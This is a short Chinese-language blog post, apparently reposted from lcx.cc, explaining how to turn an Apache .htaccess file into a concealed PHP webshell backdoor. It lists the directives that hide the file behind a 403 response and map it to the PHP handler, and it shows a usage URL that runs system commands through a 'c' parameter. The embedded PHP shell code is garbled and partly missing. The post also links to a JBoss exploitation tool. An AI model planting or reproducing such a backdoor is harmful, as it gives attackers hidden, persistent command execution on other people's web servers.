用.htaccess做更隐蔽的后门
.htaccess内容如下
#首先允许web访问这个文件Order allow,deny Allow from all RedirectMatch 403 .htaccess$ #.htaccess结尾的403错误,这里是为了增加隐蔽性 AddType application/x-httpd-php .htaccess #给.htaccess映射php拓展 ### SHELL ### &1"); ?>### KINDLE ### #恶意的php代码
使用方法:http://localhost/.htaccess/?c=dir
例子:
Order allow,deny allow from all AddType application/x-httpd-php .htaccess #
相关内容:
IIS 6.0/7.0/7.5、Nginx、Apache 等 Web Service 解析漏洞总结
JPEG MetaData and .Htaccess For Webshell Hiden
文章来源于lcx.cc:用.htaccess做更隐蔽的后门,另类PHP后门
相关推荐: Jboss JMX/EJBInvokerServlet、HtmlAdaptor漏洞利用工具
昨天花了一点时间去看以前的Jboss漏洞,选了俩比较实用的写了个小工具。 第一个漏洞主要是写去年十月份的那个deploy有点小问题:Apache Tomcat/JBoss EJBInvokerServlet / JMXInvokerServlet (RMI o…
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论